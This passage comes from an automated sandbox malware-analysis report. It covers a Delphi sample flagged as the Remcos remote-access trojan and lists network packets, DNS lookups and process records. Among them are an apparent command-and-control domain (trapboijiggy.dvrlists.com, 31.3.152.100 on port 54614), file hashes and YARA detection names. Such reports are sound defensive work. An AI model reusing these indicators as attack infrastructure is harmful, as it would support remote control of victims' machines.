Sep 22, 2021 22:04:16.727665901 CEST	49832	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:16.881990910 CEST	54614	49832	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:16.882167101 CEST	49832	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:16.891272068 CEST	49832	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:17.055269957 CEST	54614	49832	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:18.201539993 CEST	49833	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:18.354060888 CEST	54614	49833	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:18.354255915 CEST	49833	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:18.358721018 CEST	49833	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:18.514497995 CEST	54614	49833	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:19.651118994 CEST	49834	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:19.802769899 CEST	54614	49834	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:19.802911997 CEST	49834	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:19.815547943 CEST	49834	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:19.963790894 CEST	54614	49834	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:19.963927031 CEST	49834	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:19.966003895 CEST	54614	49834	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:21.105460882 CEST	49836	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:21.261703014 CEST	54614	49836	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:21.261954069 CEST	49836	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:21.271070957 CEST	49836	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:21.455341101 CEST	54614	49836	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:21.455466032 CEST	49836	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:21.705183029 CEST	49836	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:21.857218027 CEST	54614	49836	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:22.620297909 CEST	49843	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:22.771507025 CEST	54614	49843	31.3.152.100	192.168.2.5
Sep 22, 2021 22:04:22.772147894 CEST	49843	54614	192.168.2.5	31.3.152.100
Sep 22, 2021 22:04:22.795237064 CEST	49843	54614	192.168.2.5	31.3.152.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 22, 2021 22:02:01.393767118 CEST	62060	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:01.415558100 CEST	53	62060	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:17.376312017 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:17.407778025 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:28.800282001 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:28.833630085 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:29.584501028 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:29.636045933 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:33.540890932 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:33.577131987 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:40.713975906 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:40.845911980 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:43.518405914 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:43.651017904 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:44.963457108 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:45.094125032 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:46.457308054 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:46.590945959 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:50.920408010 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:51.049216032 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:52.426987886 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:52.558763981 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:53.969638109 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:54.101368904 CEST	53	60151	8.8.8.8	192.168.2.5
Sep 22, 2021 22:02:55.680922985 CEST	56969	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:02:55.812313080 CEST	53	56969	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:02.169517994 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:02.197294950 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:11.569367886 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:11.642556906 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:12.751528978 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:12.772180080 CEST	53	49992	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:12.847022057 CEST	60075	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:12.880187035 CEST	53	60075	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:13.374684095 CEST	55016	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:13.447031975 CEST	53	55016	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:19.050920963 CEST	64345	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:19.185108900 CEST	53	64345	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:20.532191038 CEST	57128	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:20.661782026 CEST	53	57128	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:21.780652046 CEST	54791	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:21.799885035 CEST	53	54791	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:22.039217949 CEST	50463	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:22.170754910 CEST	53	50463	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:22.870824099 CEST	50394	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:22.915524960 CEST	53	50394	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:23.570286989 CEST	58530	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:23.679490089 CEST	53813	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:23.700514078 CEST	53	58530	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:23.774684906 CEST	53	53813	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:28.125060081 CEST	63732	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:28.256431103 CEST	53	63732	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:29.583585978 CEST	57344	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:29.714097977 CEST	53	57344	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:31.052750111 CEST	54450	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:31.182925940 CEST	53	54450	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:32.529254913 CEST	59261	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:32.660267115 CEST	53	59261	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:34.690526962 CEST	57151	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:34.820606947 CEST	53	57151	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:36.698008060 CEST	59413	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:36.829860926 CEST	53	59413	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:38.539871931 CEST	60516	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:38.673319101 CEST	53	60516	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:40.011490107 CEST	51649	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:40.141798019 CEST	53	51649	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:41.481470108 CEST	65086	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:41.611730099 CEST	53	65086	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:43.005707979 CEST	56432	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:43.137336016 CEST	53	56432	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:47.509670019 CEST	52929	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:47.641541958 CEST	53	52929	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:48.015621901 CEST	64317	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:48.043450117 CEST	53	64317	8.8.8.8	192.168.2.5
Sep 22, 2021 22:03:49.104485035 CEST	61004	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:03:49.124564886 CEST	53	61004	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:01.476166010 CEST	56895	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:01.606525898 CEST	53	56895	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:04.551198959 CEST	62372	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:04.683954000 CEST	53	62372	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:06.006589890 CEST	61515	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:06.137870073 CEST	53	61515	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:08.037714958 CEST	56675	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:08.169452906 CEST	53	56675	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:10.350250959 CEST	57172	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:10.482726097 CEST	53	57172	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:11.803299904 CEST	55267	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:11.934073925 CEST	53	55267	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:13.568279028 CEST	50969	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:13.699009895 CEST	53	50969	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:15.143400908 CEST	64362	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:15.274677992 CEST	53	64362	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:16.596883059 CEST	54766	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:16.727174044 CEST	53	54766	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:18.068679094 CEST	61446	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:18.200897932 CEST	53	61446	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:19.519788027 CEST	57515	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:19.650417089 CEST	53	57515	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:20.972680092 CEST	58199	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:21.032320023 CEST	65221	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:21.058371067 CEST	53	65221	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:21.104692936 CEST	53	58199	8.8.8.8	192.168.2.5
Sep 22, 2021 22:04:22.481442928 CEST	61573	53	192.168.2.5	8.8.8.8
Sep 22, 2021 22:04:22.612011909 CEST	53	61573	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 22, 2021 22:02:28.800282001 CEST	192.168.2.5	8.8.8.8	0x3caf	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:29.584501028 CEST	192.168.2.5	8.8.8.8	0xb41e	Standard query (0)	l5d8cg.sn.files.1drv.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:40.713975906 CEST	192.168.2.5	8.8.8.8	0x8f8e	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:43.518405914 CEST	192.168.2.5	8.8.8.8	0x1977	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:44.963457108 CEST	192.168.2.5	8.8.8.8	0x35c	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:46.457308054 CEST	192.168.2.5	8.8.8.8	0x4727	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:50.920408010 CEST	192.168.2.5	8.8.8.8	0x4a9b	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:52.426987886 CEST	192.168.2.5	8.8.8.8	0x18ed	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:53.969638109 CEST	192.168.2.5	8.8.8.8	0xbba9	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:55.680922985 CEST	192.168.2.5	8.8.8.8	0xebe3	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:11.569367886 CEST	192.168.2.5	8.8.8.8	0x783e	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:13.374684095 CEST	192.168.2.5	8.8.8.8	0x2ce3	Standard query (0)	l5d8cg.sn.files.1drv.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:19.050920963 CEST	192.168.2.5	8.8.8.8	0xe97c	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:20.532191038 CEST	192.168.2.5	8.8.8.8	0x9bfc	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:22.039217949 CEST	192.168.2.5	8.8.8.8	0x67cd	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:22.870824099 CEST	192.168.2.5	8.8.8.8	0xd2f6	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:23.570286989 CEST	192.168.2.5	8.8.8.8	0xcc7d	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:23.679490089 CEST	192.168.2.5	8.8.8.8	0xdc2e	Standard query (0)	l5d8cg.sn.files.1drv.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:28.125060081 CEST	192.168.2.5	8.8.8.8	0xafdd	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:29.583585978 CEST	192.168.2.5	8.8.8.8	0xee35	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:31.052750111 CEST	192.168.2.5	8.8.8.8	0x1a9c	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:32.529254913 CEST	192.168.2.5	8.8.8.8	0x8d8c	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:34.690526962 CEST	192.168.2.5	8.8.8.8	0x3b2a	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:36.698008060 CEST	192.168.2.5	8.8.8.8	0xda1a	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:38.539871931 CEST	192.168.2.5	8.8.8.8	0xb5ea	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:40.011490107 CEST	192.168.2.5	8.8.8.8	0x2e75	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:41.481470108 CEST	192.168.2.5	8.8.8.8	0x7ef2	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:43.005707979 CEST	192.168.2.5	8.8.8.8	0x2937	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:47.509670019 CEST	192.168.2.5	8.8.8.8	0xc384	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:01.476166010 CEST	192.168.2.5	8.8.8.8	0x1627	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:04.551198959 CEST	192.168.2.5	8.8.8.8	0x1a14	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:06.006589890 CEST	192.168.2.5	8.8.8.8	0xdb3b	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:08.037714958 CEST	192.168.2.5	8.8.8.8	0xff5c	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:10.350250959 CEST	192.168.2.5	8.8.8.8	0xaefa	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:11.803299904 CEST	192.168.2.5	8.8.8.8	0x1f9a	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:13.568279028 CEST	192.168.2.5	8.8.8.8	0xadfc	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:15.143400908 CEST	192.168.2.5	8.8.8.8	0x74c9	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:16.596883059 CEST	192.168.2.5	8.8.8.8	0x61e4	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:18.068679094 CEST	192.168.2.5	8.8.8.8	0x3ee0	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:19.519788027 CEST	192.168.2.5	8.8.8.8	0xbc7c	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:20.972680092 CEST	192.168.2.5	8.8.8.8	0xc95c	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:22.481442928 CEST	192.168.2.5	8.8.8.8	0x2848	Standard query (0)	trapboijiggy.dvrlists.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 22, 2021 22:02:28.833630085 CEST	8.8.8.8	192.168.2.5	0x3caf	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:02:29.636045933 CEST	8.8.8.8	192.168.2.5	0xb41e	No error (0)	l5d8cg.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:02:29.636045933 CEST	8.8.8.8	192.168.2.5	0xb41e	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:02:40.845911980 CEST	8.8.8.8	192.168.2.5	0x8f8e	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:43.651017904 CEST	8.8.8.8	192.168.2.5	0x1977	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:45.094125032 CEST	8.8.8.8	192.168.2.5	0x35c	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:46.590945959 CEST	8.8.8.8	192.168.2.5	0x4727	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:51.049216032 CEST	8.8.8.8	192.168.2.5	0x4a9b	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:52.558763981 CEST	8.8.8.8	192.168.2.5	0x18ed	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:54.101368904 CEST	8.8.8.8	192.168.2.5	0xbba9	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:02:55.812313080 CEST	8.8.8.8	192.168.2.5	0xebe3	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:11.642556906 CEST	8.8.8.8	192.168.2.5	0x783e	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:03:13.447031975 CEST	8.8.8.8	192.168.2.5	0x2ce3	No error (0)	l5d8cg.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:03:13.447031975 CEST	8.8.8.8	192.168.2.5	0x2ce3	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:03:19.185108900 CEST	8.8.8.8	192.168.2.5	0xe97c	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:20.661782026 CEST	8.8.8.8	192.168.2.5	0x9bfc	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:22.170754910 CEST	8.8.8.8	192.168.2.5	0x67cd	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:22.915524960 CEST	8.8.8.8	192.168.2.5	0xd2f6	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:03:23.700514078 CEST	8.8.8.8	192.168.2.5	0xcc7d	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:23.774684906 CEST	8.8.8.8	192.168.2.5	0xdc2e	No error (0)	l5d8cg.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:03:23.774684906 CEST	8.8.8.8	192.168.2.5	0xdc2e	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 22, 2021 22:03:28.256431103 CEST	8.8.8.8	192.168.2.5	0xafdd	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:29.714097977 CEST	8.8.8.8	192.168.2.5	0xee35	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:31.182925940 CEST	8.8.8.8	192.168.2.5	0x1a9c	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:32.660267115 CEST	8.8.8.8	192.168.2.5	0x8d8c	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:34.820606947 CEST	8.8.8.8	192.168.2.5	0x3b2a	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:36.829860926 CEST	8.8.8.8	192.168.2.5	0xda1a	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:38.673319101 CEST	8.8.8.8	192.168.2.5	0xb5ea	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:40.141798019 CEST	8.8.8.8	192.168.2.5	0x2e75	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:41.611730099 CEST	8.8.8.8	192.168.2.5	0x7ef2	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:43.137336016 CEST	8.8.8.8	192.168.2.5	0x2937	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:03:47.641541958 CEST	8.8.8.8	192.168.2.5	0xc384	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:01.606525898 CEST	8.8.8.8	192.168.2.5	0x1627	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:04.683954000 CEST	8.8.8.8	192.168.2.5	0x1a14	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:06.137870073 CEST	8.8.8.8	192.168.2.5	0xdb3b	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:08.169452906 CEST	8.8.8.8	192.168.2.5	0xff5c	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:10.482726097 CEST	8.8.8.8	192.168.2.5	0xaefa	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:11.934073925 CEST	8.8.8.8	192.168.2.5	0x1f9a	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:13.699009895 CEST	8.8.8.8	192.168.2.5	0xadfc	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:15.274677992 CEST	8.8.8.8	192.168.2.5	0x74c9	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:16.727174044 CEST	8.8.8.8	192.168.2.5	0x61e4	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:18.200897932 CEST	8.8.8.8	192.168.2.5	0x3ee0	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:19.650417089 CEST	8.8.8.8	192.168.2.5	0xbc7c	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:21.104692936 CEST	8.8.8.8	192.168.2.5	0xc95c	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 22, 2021 22:04:22.612011909 CEST	8.8.8.8	192.168.2.5	0x2848	No error (0)	trapboijiggy.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ZfigYV6HXd.exe PID: 3192 Parent PID: 4512

General

Start time:	22:02:06
Start date:	22/09/2021
Path:	C:\Users\user\Desktop\ZfigYV6HXd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ZfigYV6HXd.exe'
Imagebase:	0x400000
File size:	1017856 bytes
MD5 hash:	1A1A9B3969ABCD2FCCD2C6CE20BE68AC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: logagent.exe PID: 6224 Parent PID: 3192

General

Start time:	22:02:34
Start date:	22/09/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\logagent.exe
Imagebase:	0xe40000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.519137260.0000000003017000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.520767321.0000000010590000.00000040.00000001.sdmp, Author: unknown
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6272 Parent PID: 3192

General

